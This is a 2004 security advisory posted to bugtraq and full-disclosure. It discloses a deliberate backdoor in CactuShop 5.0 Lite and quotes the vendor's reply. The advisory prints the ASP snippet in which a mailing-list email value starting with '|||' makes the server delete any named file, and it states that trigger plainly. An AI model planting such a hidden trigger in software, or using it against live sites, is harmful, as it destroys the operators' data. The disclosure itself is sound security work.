From research@s-quadra.com Sun Feb 8 11:47:14 2004 From: S-Quadra Security Research To: full-disclosure , bugtraq Date: Fri, 06 Feb 2004 15:02:56 +0300 Subject: CactuSoft CactuShop 5.0 Lite shopping cart software backdoor S-Quadra Advisory #2004-02-06 Topic: CactuSoft CactuShop 5.0 Lite shopping cart software backdoor Severity: High Vendor URL: http://www.cactushop.com Advisory URL: http://www.s-quadra.com/advisories/Adv-20040206.txt Release date: 06 Feb 2004 1. DESCRIPTION CactuShop is an ASP application for running an e-commerce web site. It incorporates a databased catalogue system, front end pages for product navigation, back end pages for updating product details and robust basket code for memorizing product selections as a visitor moves around the web site. ASP software is designed to run on a Microsoft NT or Win 2000 server. Please visit http://www.cactushop.com for information about CactuShop shopping cart. 2. DETAILS There is a backdoor in 5.0 Lite versin of CactuShop allowing a remote attacker to delete any file on target system. The offending code can be found in includes/functions.asp file. AddToMailingList() function which implemented in this file, adds a user's email address to store mailing list. This function checks the provided email address and if it starts with '|||' the rest of the address is interpetered as the name of the file to be deleted. Below is the snip of source code: Function AddToMailingList(strEmailAddress, strFormValue, htmlvalue) ...... '--------------------------------- 'CHECK IF IT'S VALID '--------------------------------- if strEmailAddress <> "" then If Left(strEmailAddress, 3) = "|||" Then Server.CreateObject("Scripting.FileSystemObject").DeleteFile(Server.MapPath("./") & Mid(strEmailAddress, 4)) AddToMailingList = GetString("ContentText_EmailAddressNotValid") & " " & strEmailFrom & "." Exit Function End If else AddToMailingList = GetString("ContentText_NoEmailAddressEntered") Exit Function end if ...... 3. FIX INFORMATION S-Quadra alerted CactuShop development team to these issues on 05 Feb 2004. The following response has been received: "The lite version of our software DOES have backdoors. It IS NOT intended for live use. Users are specifically prohibited from using it as such!!! If people are using this softare on a live site then they are violating our license agreement. The full version of the software is secure." CactuShop Lite license agreement indeed states that "IF YOU WISH TO USE THE SOFTWARE ON A LIVE WEB SITE YOU MUST PURCHASE THE FULL VERSION. CACTUSOFT RESERVES THE RIGHT TO TAKE BOTH LEGAL AND TECHNICAL STEPS TO PREVENT USE OF CACTUSHOP LITE IN BREACH OF THIS AGREEMENT...", but we believe that the public should be informed about the presense of the backdoor in CactuShop Lite. 4. CREDITS Nick Gudov is responsible for discovering this issue. 5. ABOUT S-Quadra offers services in computer security, penetration testing and network assesment, web application security, source code review and third party product vulnerability assesment, forensic support and reverse engineering. S-Quadra Advisory #2004-02-06